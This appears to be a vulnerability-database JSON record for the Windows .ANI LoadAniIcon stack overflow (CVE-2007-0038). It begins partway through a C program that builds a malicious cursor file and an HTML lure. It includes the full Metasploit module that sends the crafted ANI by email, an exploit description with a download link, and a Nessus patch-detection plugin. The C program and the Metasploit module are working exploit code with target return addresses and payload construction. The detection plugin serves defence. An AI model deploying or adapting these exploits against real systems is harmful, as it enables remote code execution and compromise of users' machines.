<windows.h>\n\n/* ANI Header */\nunsigned char uszAniHeader[] =\n\"\\x52\\x49\\x46\\x46\\x00\\x04\\x00\\x00\\x41\\x43\\x4F\\x4E\\x61\\x6E\\x69\\x68\"\n\"\\x24\\x00\\x00\\x00\\x24\\x00\\x00\\x00\\xFF\\xFF\\x00\\x00\\x0A\\x00\\x00\\x00\"\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n\"\\x10\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x54\\x53\\x49\\x4C\\x03\\x00\\x00\\x00\"\n\"\\x10\\x00\\x00\\x00\\x54\\x53\\x49\\x4C\\x03\\x00\\x00\\x00\\x02\\x02\\x02\\x02\"\n\"\\x61\\x6E\\x69\\x68\\xA8\\x03\\x00\\x00\";\n\n/* system(\"calc.exe\"); */\nchar szExecute[] = \"logoff.exe\\x00\";\n\nunsigned char uszHtml[] =\n\"<html>\"\n\"Microsoft Windows .ANI LoadAniIcon Exploit\"\n\"<br>Copyright (c) 2007 devcode<br>\"\n\"<style>\" \\\n\"* {CURSOR: url(\\\"poc.ani\\\")}</style></head>\"\n\"</html>\";\n\n/* Usage: ani.exe 1*/\nchar szIntro[] =\n\"\\n\\t\\tWindows .ANI LoadAniIcon Stack Overflow\\n\"\n\"\\t\\t\\tdevcode (c) 2007\\n\"\n\"[+] Targets:\\n\"\n\"\\t(0) Kernel32.dll (ExitProcess)\\n\"\n\"\\t(1) Windows XP SP2 + DEP\\n\"\n\"\\t(2) Windows 2003 Server\\n\"\n\"Usage: ani.exe <target>\";\n\n/* RET2LIBC attack */\ntypedef struct {\n\tconst char *szTarget;\n\t/* kernel32.dll - set the proper stack frame\n\t\tLEA EBP, DWORD PTR SS:[ESP+10]\n\t\tSUB ESP, EAX\n\t\tPUSH EBX\n\t\tPUSH ESI\n\t\tPUSH EDI\n\t\t....\n\t\t....\n\t\tRETN\n\t*/\n\tunsigned char uszRet[5];\n\t/* msvcrt.dll - system() */\n\tunsigned char uszMsvcrtCall[5];\n} TARGET;\n\nTARGET targets[] = {\n\t{ \"Kernel32.dll (ExitProcess)\", \"\\x90\\x90\\x90\\x90\", \"\\x90\\x90\\x90\\x90\" },\n\t{ \"Windows XP SP2\", \"\\xD6\\x24\\x80\\x7C\", \"\\xC7\\x93\\xC2\\x77\" },\n\t{ \"Windows 2003 Server\", \"\\x0A\\x17\\xE4\\x77\", \"\\x10\\x8C\\xBB\\x77\" }\n};\n\nint main( int argc, char **argv ) {\n\tchar szBuffer[1024];\n\tFILE *f;\n\tvoid *pExitProcess[4];\n\n\tif ( argc < 2 ) {\n\t\tprintf(\"%s\\n\", szIntro );\n\t\treturn 0;\n\t}\n\n\tif ( atoi( argv[1] ) == 0 ) {\n\t\tprintf(\"[+] Getting ExitProcess address...\\n\");\n\t\t*pExitProcess = GetProcAddress( GetModuleHandle( \"kernel32.dll\" ), \n\"ExitProcess\" );\n\t\tif ( pExitProcess == NULL ) {\n\t\t\tprintf(\"[-] Cannot get ExitProcess address\\n\");\n\t\t\treturn 0;\n\t\t}\n\t\tmemcpy( targets[1].uszRet, pExitProcess, 4 );\n\t}\n\n\tprintf(\"[+] Creating ANI header...\\n\");\n\tmemset( szBuffer, 0x90, sizeof( szBuffer ) );\n\tmemcpy( szBuffer, uszAniHeader, sizeof( uszAniHeader ) - 1 );\n\n\tprintf(\"[+] Copying execution code...\\n\");\n\tmemcpy( szBuffer + 168, targets[atoi( argv[1] )].uszRet, 4 );\n\tmemset( szBuffer + 136, 0, 4 );\n\tmemset( szBuffer + 204, 0, 4 );\n\tszBuffer[136] = 0x6C;\n\tszBuffer[204] = 0x6C;\n\tmemcpy( szBuffer + 196, targets[atoi(argv[1])].uszMsvcrtCall, 4 );\n\tmemcpy( szBuffer + 200, targets[atoi(argv[1])].uszMsvcrtCall, 4 );\n\tmemcpy( szBuffer + 240, szExecute, sizeof( szExecute ) - 1 );\n\n\tf = fopen( \"poc.ani\", \"wb\" );\n\tif ( f == NULL ) {\n\t\tprintf(\"[-] Cannot create ani file\\n\");\n\t\treturn 0;\n\t}\n\n\tfwrite( szBuffer, 1, 1024, f );\n\tfclose( f );\n\tprintf(\"[+] .ANI file succesfully created!\\n\");\n\n\tf = fopen( \"poc.html\", \"wb\" );\n\tif ( f == NULL ) {\n\t\tprintf(\"[-] Cannot create html file\\n\");\n\t\treturn 0;\n\t}\n\n\tfwrite( uszHtml, 1, sizeof( uszHtml ), f );\n\tfclose( f );\n\tprintf(\"[+] HTML file succesfully created!\\n\");\n\n\treturn 0;\n}\n\n// milw0rm.com [2007-04-03]\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/3652/"}, {"lastseen": "2016-01-31T18:58:30", "osvdbidlist": ["33629"], "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"], "references": [], "description": "MS Windows Animated Cursor (.ANI) Remote Exploit (eeye patch bypass). CVE-2007-0038,CVE-2007-1765. Remote exploit for windows platform", "reporter": "jamikazu", "published": "2007-04-01T00:00:00", "type": "exploitdb", "title": "Microsoft Windows - Animated Cursor .ANI Remote Exploit eeye patch bypass", "enchantments": {"score": {"vector": "NONE", "value": 10.0}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2007-0038", "CVE-2007-1765"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "modified": "2007-04-01T00:00:00", "id": "EDB-ID:3636", "href": "https://www.exploit-db.com/exploits/3636/", "sourceData": "..::[ jamikazu presents ]::..\r\n\r\nWindows Animated Cursor Handling Exploit (0day) (Version3)\r\n\r\nWorks on fully patched Windows Vista\r\nI think it is first real remote code execution exploit on vista =)\r\n\r\nTested on:\r\nWindows Vista Enterprise Version 6.0 (Build 6000) (default installation and UAC enabled)\r\nWindows Vista Ultimate Version 6.0 (Build 6000) (default installation and UAC enabled)\r\nWindows XP SP2 \r\n(It also must to work on all nt based windows but not tested)\r\n\r\nUpdate: It also bypass eeye security ani patch!\r\n\r\nAuthor: jamikazu \r\nMail: jamikazu@gmail.com\r\n\r\nBug discovered by determina (http://www.determina.com)\r\n\r\nCredit: milw0rm,metasploit, SkyLined, http://doctus.net/\r\n\r\ninvokes calc.exe if successful \r\n\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/3636.zip (04012007-exp.zip)\r\n\r\n# milw0rm.com [2007-04-01]\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/3636/"}], "metasploit": [{"lastseen": "2018-08-29T01:44:11", "_object_types": ["robots.models.base.Bulletin", "robots.models.metasploit.MetasploitBulletin"], "references": [], "description": "This module exploits a buffer overflow vulnerability in the LoadAniIcon() function of USER32.dll. The flaw is triggered through Outlook Express by using the CURSOR style sheet directive to load a malicious .ANI file. This vulnerability was discovered by Alexander Sotirov of Determina and was rediscovered, in the wild, by McAfee.", "reporter": "Rapid7", "published": "2010-07-25T16:02:51", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/email/ms07_017_ani_loadimage_chunksize.rb", "type": "metasploit", "title": "Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (SMTP)", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2007-0038", "CVE-2007-1765"], "_object_type": "robots.models.metasploit.MetasploitBulletin", "modified": "2017-07-24T13:26:21", "metasploitReliability": "Great", "id": "MSF:EXPLOIT/WINDOWS/EMAIL/MS07_017_ANI_LOADIMAGE_CHUNKSIZE", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GreatRanking\n\n #\n # This module sends email messages via smtp\n #\n include Msf::Exploit::Remote::SMTPDeliver\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (SMTP)',\n 'Description' => %q{\n This module exploits a buffer overflow vulnerability in the\n LoadAniIcon() function of USER32.dll. The flaw is triggered\n through Outlook Express by using the CURSOR style sheet\n directive to load a malicious .ANI file.\n\n This vulnerability was discovered by Alexander Sotirov of Determina\n and was rediscovered, in the wild, by McAfee.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'hdm', # First version\n 'skape', # Vista support\n ],\n 'References' =>\n [\n ['MSB', 'MS07-017'],\n ['CVE', '2007-0038'],\n ['CVE', '2007-1765'],\n ['OSVDB', '33629'],\n ['BID', '23194'],\n ['URL', 'http://www.microsoft.com/technet/security/advisory/935423.mspx']\n ],\n 'Stance' => Msf::Exploit::Stance::Passive,\n 'DefaultOptions' =>\n {\n # Cause internet explorer to exit after the code hits\n 'EXITFUNC' => 'process',\n },\n 'Payload' =>\n {\n 'Space' => 1024 + (rand(1000)),\n 'MinNops' => 32,\n 'Compat' =>\n {\n 'ConnectionType' => '-bind -find',\n },\n\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n\n #\n # Use multiple cursor URLs to try all targets. This can result in\n # multiple, sequential sessions\n #\n\n [ 'Automatic', {} ],\n\n #\n # The following targets use call [ebx+4], just like the original exploit\n #\n\n # Partial overwrite doesn't work for Outlook Express\n [ 'Windows XP SP2 user32.dll 5.1.2600.2622', { 'Ret' => 0x25ba, 'Len' => 2 }],\n\n # Should work for all English XP SP2\n [ 'Windows XP SP2 userenv.dll English', { 'Ret' => 0x769fc81a }],\n\n # Supplied by Fabrice MOURRON <fab[at]revhosts.net>\n [ 'Windows XP SP2 userenv.dll French', { 'Ret' => 0x7699c81a }],\n\n # Should work for English XP SP0/SP1\n [ 'Windows XP SP0/SP1 netui2.dll English', { 'Ret' => 0x71bd0205 }],\n\n # Should work for English 2000 SP0-SP4+\n [ 'Windows 2000 SP0-SP4 netui2.dll English', { 'Ret' => 0x75116d88 }],\n\n #\n # Partial overwrite where 700b is a jmp dword [ebx] ebx points to the start\n # of the RIFF chunk itself. The length field of the RIFF chunk\n # tag contains a short jump into an embedded riff chunk that\n # makes a long relative jump into the actual payload.\n #\n [ 'Windows Vista user32.dll 6.0.6000.16386',\n {\n 'Ret' => 0x700b,\n 'Len' => 2,\n\n # On Vista, the pages that contain the RIFF are read-only.\n # In-place decoders cannot be used.\n 'Payload' => { 'EncoderType' => Msf::Encoder::Type::Raw }\n }\n ],\n\n #\n # Supplied by Ramon de C Valle\n #\n\n # call [ebx+4]\n [ 'Windows XP SP2 user32.dll (5.1.2600.2180) Multi Language', { 'Ret' => 0x25d0, 'Len' => 2 }],\n [ 'Windows XP SP2 user32.dll (5.1.2600.2180) English', { 'Ret' => 0x77d825d0 }],\n [ 'Windows XP SP2 userenv.dll Portuguese (Brazil)', { 'Ret' => 0x769dc81a }],\n\n # call [esi+4]\n [ 'Windows XP SP1a userenv.dll English', { 'Ret' => 0x75a758b1 }],\n [ 'Windows XP SP1a shell32.dll English', { 'Ret' => 0x77441a66 }]\n ],\n 'DisclosureDate' => 'Mar 28 2007',\n 'DefaultTarget' => 0))\n\n end\n\n def autofilter\n false\n end\n\n def exploit\n\n exts = ['bmp', 'wav', 'png', 'zip', 'tar']\n\n gext = exts[rand(exts.length)]\n name = rand_text_alpha(rand(10)+1) + \".#{gext}\"\n\n anis = {}\n\n html =\n \"<html><head><title>\" +\n rand_text_alphanumeric(rand(128)+4) +\n \"</title>\" +\n \"</head><body>\" + rand_text_alphanumeric(rand(128)+1)\n\n\n mytargs = (target.name =~ /Automatic/) ? targets : [target]\n\n if target.name =~ /Automatic/\n targets.each_index { |i|\n next if not targets[i].ret\n acid = generate_cid\n html << generate_div(\"cid:#{acid}\")\n\n # Re-generate the payload, using the explicit target\n return if ((p = regenerate_payload(nil, nil, targets[i])) == nil)\n\n # Generate an ANI file for this target\n anis[acid] = generate_ani(p, targets[i])\n }\n else\n acid = generate_cid\n html << generate_div(\"cid:#{acid}\")\n\n # Re-generate the payload, using the explicit target\n return if ((p = regenerate_payload(nil, nil, target)) == nil)\n\n # Generate an ANI file for this target\n anis[acid] = generate_ani(p, target)\n end\n\n html << \"</body></html>\"\n\n\n msg = Rex::MIME::Message.new\n msg.mime_defaults\n msg.subject = datastore['SUBJECT'] || Rex::Text.rand_text_alpha(rand(32)+1)\n msg.to = datastore['MAILTO']\n msg.from = datastore['MAILFROM']\n\n msg.add_part(Rex::Text.encode_base64(html, \"\\r\\n\"), \"text/html\", \"base64\", \"inline\")\n anis.each_pair do |cid,ani|\n part = msg.add_part_attachment(ani, cid + \".\" + gext)\n part.header.set(\"Content-ID\", \"<\"+cid+\">\")\n end\n\n send_message(msg.to_s)\n\n print_status(\"Waiting for a payload session (backgrounding)...\")\n end\n\n def generate_cid\n rand_text_alphanumeric(32)+'@'+rand_text_alphanumeric(8)\n end\n\n def generate_div(url)\n \"<div style='\" +\n generate_css_padding() +\n Rex::Text.to_rand_case(\"cursor\") +\n generate_css_padding() +\n \":\" +\n generate_css_padding() +\n Rex::Text.to_rand_case(\"url(\") +\n generate_css_padding() +\n \"\\\"#{url}\\\"\" +\n generate_css_padding() +\n \");\" +\n generate_css_padding() +\n \"'>\" +\n generate_padding() +\n \"</div>\"\n end\n\n def generate_ani(payload, target)\n\n # Build the first ANI header\n anih_a = [\n 36, # DWORD cbSizeof\n rand(128)+16, # DWORD cFrames\n rand(1024)+1, # DWORD cSteps\n 0, # DWORD cx,cy (reserved - 0)\n 0, # DWORD cBitCount, cPlanes (reserved - 0)\n 0, 0, 0, # JIF jifRate\n 1 # DWORD flags\n ].pack('V9')\n\n anih_b = nil\n\n if (target.name =~ /Vista/)\n # Vista has ebp=80, eip=84\n anih_b = rand_text(84)\n\n # Patch local variables and loop counters\n anih_b[68, 12] = [0].pack(\"V\") * 3\n else\n # XP/2K has ebp=76 and eip=80\n anih_b = rand_text(80)\n\n # Patch local variables and loop counters\n anih_b[64, 12] = [0].pack(\"V\") * 3\n end\n\n # Overwrite the return with address of a \"call ptr [ebx+4]\"\n anih_b << [target.ret].pack('V')[0, target['Len'] ? target['Len'] : 4]\n\n # Begin the ANI chunk\n riff = \"ACON\"\n\n # Calculate the data offset for the trampoline chunk and add\n # the trampoline chunk if we're attacking Vista\n if target.name =~ /Vista/\n trampoline_doffset = riff.length + 8\n\n riff << generate_trampoline_riff_chunk\n end\n\n # Insert random RIFF chunks\n 0.upto(rand(128)+16) do |i|\n riff << generate_riff_chunk()\n end\n\n # Embed the first ANI header\n riff << \"anih\" + [anih_a.length].pack('V') + anih_a\n\n # Insert random RIFF chunks\n 0.upto(rand(128)+16) do |i|\n riff << generate_riff_chunk()\n end\n\n # Trigger the return address overwrite\n riff << \"anih\" + [anih_b.length].pack('V') + anih_b\n\n # If this is a Vista target, then we need to align the length of the\n # RIFF chunk so that the low order two bytes are equal to a jmp $+0x16\n if target.name =~ /Vista/\n plen = (riff.length & 0xffff0000) | 0x0eeb\n plen += 0x10000 if (plen - 8) < riff.length\n\n riff << generate_riff_chunk((plen - 8) - riff.length)\n\n # Replace the operand to the relative jump to point into the actual\n # payload itself which comes after the riff chunk\n riff[trampoline_doffset + 1, 4] = [riff.length - trampoline_doffset - 5].pack('V')\n end\n\n # Place the RIFF chunk in front and off we go\n ret = \"RIFF\" + [riff.length].pack('V') + riff\n\n # We copy the encoded payload to the stack because sometimes the RIFF\n # image is mapped in read-only pages. This would prevent in-place\n # decoders from working, and we can't have that.\n ret << Rex::Arch::X86.copy_to_stack(payload.encoded.length)\n\n # Place the real payload right after it.\n ret << payload.encoded\n\n ret\n\n end\n\n # Generates a riff chunk with the first bytes of the data being a relative\n # jump. This is used to bounce to the actual payload\n def generate_trampoline_riff_chunk\n tag = Rex::Text.to_rand_case(rand_text_alpha(4))\n dat = \"\\xe9\\xff\\xff\\xff\\xff\" + rand_text(1) + (rand_text(rand(256)+1) * 2)\n tag +\t[dat.length].pack('V') + dat\n end\n\n def generate_riff_chunk(len = (rand(256)+1) * 2)\n tag = Rex::Text.to_rand_case(rand_text_alpha(4))\n dat = rand_text(len)\n tag + [dat.length].pack('V') + dat\n end\n\n def generate_css_padding\n buf =\n generate_whitespace() +\n \"/*\" +\n generate_whitespace() +\n generate_padding() +\n generate_whitespace() +\n \"*/\" +\n generate_whitespace()\n end\n\n def generate_whitespace\n len = rand(100)+2\n set = \"\\x09\\x20\\x0d\\x0a\"\n buf = ''\n\n while (buf.length < len)\n buf << set[rand(set.length)].chr\n end\n buf\n end\n\n def generate_padding\n rand_text_alphanumeric(rand(128)+4)\n end\nend\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/email/ms07_017_ani_loadimage_chunksize.rb"}], "securityvulns": [{"lastseen": "2018-08-31T11:09:25", "references": ["https://vulners.com/securityvulns/securityvulns:doc:16516", "https://vulners.com/securityvulns/securityvulns:doc:16526", "https://vulners.com/securityvulns/securityvulns:doc:16545", "https://vulners.com/securityvulns/securityvulns:doc:16544", "https://vulners.com/securityvulns/securityvulns:doc:16555", "https://vulners.com/securityvulns/securityvulns:doc:16518", "https://vulners.com/securityvulns/securityvulns:doc:16517"], "description": "Stack buffer overflow (stack overrun) is actively used for hidden malware installation.", "edition": 1, "reporter": "BUGTRAQ", "published": "2007-04-04T00:00:00", "title": "Microsoft Windows animated cursors buffer overflow", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:09:25", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2007-1867", "CVE-2007-0038", "CVE-2007-1765"], "modified": "2007-04-04T00:00:00", "id": "SECURITYVULNS:VULN:7508", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:7508", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2018-11-17T02:57:43", "references": ["https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2007/ms07-017"], "pluginID": "24911", "description": "The remote host is running a version of Windows with a bug in the Animated Cursor (ANI) handling routine that could allow an attacker to execute arbitrary code on the remote host by sending a specially crafted email or by luring a user on the remote host into visiting a rogue web site.\n\nAdditionally, the system is vulnerable to :\n\n - Local Privilege Elevation (GDI, EMF, Font Rasterizer)\n\n - Denial of Service (WMF)", "edition": 8, "reporter": "Tenable", "published": "2007-04-03T00:00:00", "title": "MS07-017: Vulnerabilities in GDI Could Allow Remote Code Execution (925902)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 9.3}}, "naslFamily": "Windows : Microsoft Bulletins", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-1211", "CVE-2007-1213", "CVE-2006-5586", "CVE-2007-1212", "CVE-2007-1215", "CVE-2007-0038", "CVE-2006-5758", "CVE-2007-1765"], "modified": "2018-11-15T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS07-017.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=24911", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(24911);\n script_version(\"1.37\");\n script_cvs_date(\"Date: 2018/11/15 20:50:30\");\n\n script_cve_id(\n \"CVE-2006-5586\",\n \"CVE-2006-5758\",\n \"CVE-2007-0038\",\n \"CVE-2007-1211\",\n \"CVE-2007-1212\",\n \"CVE-2007-1213\",\n \"CVE-2007-1215\",\n \"CVE-2007-1765\"\n );\n script_bugtraq_id(23194, 23273, 23275, 23276, 23277, 23278);\n script_xref(name:\"MSFT\", value:\"MS07-017\");\n script_xref(name:\"MSKB\", value:\"925902\");\n \n script_xref(name:\"IAVA\", value:\"2007-A-0020\");\n script_xref(name:\"CERT\", value:\"191609\");\n script_xref(name:\"EDB-ID\", value:\"3617\");\n script_xref(name:\"EDB-ID\", value:\"3634\");\n script_xref(name:\"EDB-ID\", value:\"3635\");\n script_xref(name:\"EDB-ID\", value:\"3636\");\n script_xref(name:\"EDB-ID\", value:\"3652\");\n script_xref(name:\"EDB-ID\", value:\"16526\");\n script_xref(name:\"EDB-ID\", value:\"16698\");\n\n script_name(english:\"MS07-017: Vulnerabilities in GDI Could Allow Remote Code Execution (925902)\");\n script_summary(english:\"Determines the presence of update 925902\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"Arbitrary code can be executed on the remote host through the email\nclient or the web browser.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of Windows with a bug in the\nAnimated Cursor (ANI) handling routine that could allow an attacker to\nexecute arbitrary code on the remote host by sending a specially crafted\nemail or by luring a user on the remote host into visiting a rogue web\nsite.\n\nAdditionally, the system is vulnerable to :\n\n - Local Privilege Elevation (GDI, EMF, Font Rasterizer)\n\n - Denial of Service (WMF)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2007/ms07-017\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released a set of patches for Windows 2000, XP, 2003 and\nVista.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (SMTP)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/11/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/04/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/04/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(english:\"This script is Copyright (C) 2007-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, 'Host/patch_management_checks');\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS07-017';\nkb = \"925902\";\n\nkbs = make_list(kb);\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win2k:'4,5', xp:'2', win2003:'0,2', vista:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nrootfile = hotfix_get_systemroot();\nif (!rootfile) exit(1, \"Failed to get the system root.\");\n\nshare = hotfix_path2share(path:rootfile);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n hotfix_is_vulnerable(os:\"6.0\", sp:0, file:\"User32.dll\", version:\"6.0.6000.16438\", dir:\"\\System32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.0\", sp:0, file:\"User32.dll\", version:\"6.0.6000.20537\", min_version:\"6.0.6000.20000\", dir:\"\\System32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"User32.dll\", version:\"5.2.3790.4033\", dir:\"\\System32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.2\", sp:1, file:\"User32.dll\", version:\"5.2.3790.2892\", dir:\"\\System32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.2\", sp:0, file:\"User32.dll\", version:\"5.2.3790.651\", dir:\"\\System32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.1\", file:\"User32.dll\", version:\"5.1.2600.3099\", dir:\"\\System32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.0\", file:\"User32.dll\", version:\"5.0.2195.7133\", dir:\"\\System32\", bulletin:bulletin, kb:kb)\n)\n{\n set_kb_item(name:\"SMB/Missing/\"+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, 'affected');\n}\n\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}
